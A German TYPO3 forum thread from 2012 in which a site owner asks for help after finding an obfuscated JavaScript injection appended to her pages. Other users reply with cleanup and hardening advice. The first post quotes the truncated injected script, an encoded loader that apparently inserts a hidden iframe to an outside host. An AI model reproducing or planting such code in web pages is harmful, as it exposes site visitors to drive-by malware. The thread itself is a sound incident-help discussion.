Zum Inhalt springen

Malware-Code entdeckt

Erstellt am 20. April 2012 · 10 Antworten · letzte Antwort am 21. April 2012

Tags: Frage

Drusilla ·

Ich habe gerade ein schlimmes Problem, und zwar gab es für eine Seite von mir eine Google-Malware-Warunung. Nach Durchsicht des Quellcodes habe ich auch das entsprechende böse Javascript gefunden:

</body> </html><!-- ad --><script>c=3-1;i=-1-1+c;p=parseInt;if(p("01"+"2"+"3")===83)try{Number()["pr"+"ot"+"ot"+"ype"].q}catch(egewgsd){if(window.document)f=[-32k-32k64k61k-9k-1k59k70k58k76k68k60k69k75k5k62k60k75k28k67k60k68k60k69k75k74k25k80k43k56k62k37k56k68k60k-1k-2k57k70k59k80k-2k0k50k7k52k0k82k-28k-32k-32k-32k64k61k73k56k68k60k73k-1k0k18k-28k-32k-32k84k-9k60k67k74k60k-9k82k-28k-32k-32k-32k59k70k58k76k68k60k69k75k5k78k73k64k75k60k-1k-7k19k64k61k73k56k68k60k-9k74k73k58k20k-2k63k75k75k71k17k6k6k59k64k62k64k56k67k64k75k80k5k64k69k6k64k69k5k58k62k64k22k12k-2k-9k78k64k59k75k63k20k-2k8k7k-2k-9k63k60k64k62k63k75k20k-2k8k7k-2k-9k74k75k80k67k60k20k-...

Das hat sich ganz an das Ende des generierten Quellcodes gehängt.

Es scheint auch zumindest eine Datei im Backend korumpiert zu haben:
sysext/recordlist/mod1/index.php
Für diese Datei gab es im Backend eine Fehlermeldung. Sie ließ sich auch nicht mit einem Editor öffnen. Zum Glück konnte ich sie durch eine alte Sicherungskopie ersetzen.
Ich weiss nicht, ob es hier Zusammenhänge gibt.

Typo3 ist Version 4.5

Woher kommt das denn? Und wie bekomme ich das wieder los?
Ist die Seite jetzt unsicher und muss platt gemacht werden? Und wie verhindert man, das so was überhaupt passiert?
Für Tipps wäre ich sehr dankbar! *panik*
😢

LuP ·

Hallo,

Backup machen und alle Logs sichern. Website vom Netz nehmen und alle Logs (Web-, FTP-Server) prüfen. Daraus ableiten, von wo die schädlichen Codes eingeschleust wurden. Suspekte Erweiterungen direkt an das Security-Team melden. TYPO3 neu aufsetzen und aktuell halten. Bei der Auswahl von Erweiterungen auch mal die Security bulletins beachten und evtl. sich hier im Forum einen Rat holen. Auch sollte der PC frei von Virus/Malware sein. Ähnlichen Fall gab es hier: TYPO3 "index.php" gehackt.

VG,
LuP

Drusilla ·

ja, und der tolle Support beim Provider meinte 'ich kann Ihnen leider keine Log-Dateien zur Verfügung stellen', und ansonsten hat er mich nur gebeten, dass ich die schadhaften Dateien doch bitte umgehend entfernen solle. Das nenne ich mal Service.

Ich habe mittlerweile rausgefunden, dass noch mehr index.php (hauptsächlich) geändert wurden, alle zum gleichen Zeitpunkt, ich denke mal, dass war wohl der Angriff?
Wie das zustande kam, kann ich leider nicht nachvollziehen.

LuP ·

Ohne Logs wird es schwer zu nachvollziehen. Es ist nicht auszuschliessen, dass weitere Dateien betroffen sind. Dein aktuelles System ist jedenfalls nicht mehr sicher. Du solltest zu einem besseren Provider wechseln, der Dir raw Logs zur Verfügung stellt. Scanne Deinen PC mit einem aktuellen Antivirus, setze TYPO3 neu und achte drauf, welche Erweiterung Du künftig installierst.

VG,
LuP

thn ·

Moin LuP,

LuP schrieb

Du solltest zu einem besseren Provider wechseln, der Dir raw Logs zur Verfügung stellt.

Ist damit mehr als der Modebegriff gemeint?
Das ein Anbieter keinerlei LogFiles zur Verfuegung stellt ist schon ungewoehnlich, doch ein RawLog zu bekommen ebenso.

gruss tom

thn ·
Drusilla schrieb

Es scheint auch zumindest eine Datei im Backend korumpiert zu haben:
sysext/recordlist/mod1/index.php

Diese haette fuer den WebUser eigentlich gar nicht (be)schreibbar sein sollen, oder? Du hast also den gesamten Source im DocRoot, richtig?

Und wie verhindert man, das so was überhaupt passiert?

Mit einem Einsatz z.B. von tripwire o.ae. kann man die Dinge spaeter besser nachvollziehen, weil man so den Zeitpunkt der Aenderung sieht und diesen mit den LogFiles abgleichen kann.

gruss tom

Drusilla ·

Danke für die Hinweise!

Ja, das lag alles im root-Verzeichnis.
Sollte man die ganze Installation besser in ein Unterverzeichnis packen?

Habe mittlerweile festgestellt, das so (fast?) alle index.php oder index.html-Dateien von Änderungen betroffen waren, sowohl in der typo3-Installation als auch in anderen Verzeichnissen, die seperat liegen. Die Änderungen haben alle zum gleichen Zeitpunkt stattgefunden und davor hatte garantiert niemand an dem System gearbeitet.
Ich habe jetzt komplett alles gelöscht und installiere typo3 nochmal. 😢

Kann ich die Inhalte aus der Datenbank noch nehmen oder ist das zu unsicher?

LuP ·

Hallo tom,

mit raw logs wollte ich mich auf die Apache access.log Dateien beziehen. Diese lassen sich z.B. mittels vlogger auf vHost-Basis splitten und in jedes Userverzeichnis ablegen.

@ Drusilla
auch die Inhalte aus der DB sind nicht mehr sicher.

Vg,
LuP

thn ·
Drusilla schrieb

Kann ich die Inhalte aus der Datenbank noch nehmen oder ist das zu unsicher?

Siehe beispielsweise hier:
Use Separate Database Users for FE and BE auf:
http://wiki.typo3.org/Security
Weil Du gewiss keine verschiedenen user angelegt hast,
kannst Du Deine Datenbank-Inhalt durchaus als kompromitiert ansehen.

Leider hast Du, soweit keine wirklichen Zugriffe auf den Server und dessen Einstellungen bestehen, kaum richtige Moeglichkeiten viel abzusichern, sondern musst Dich leider auf die Konfiguration des Anbieters verlassen.
Genau hier aber trennt sich qualitativ die Spreu vom Weizen...

gruss tom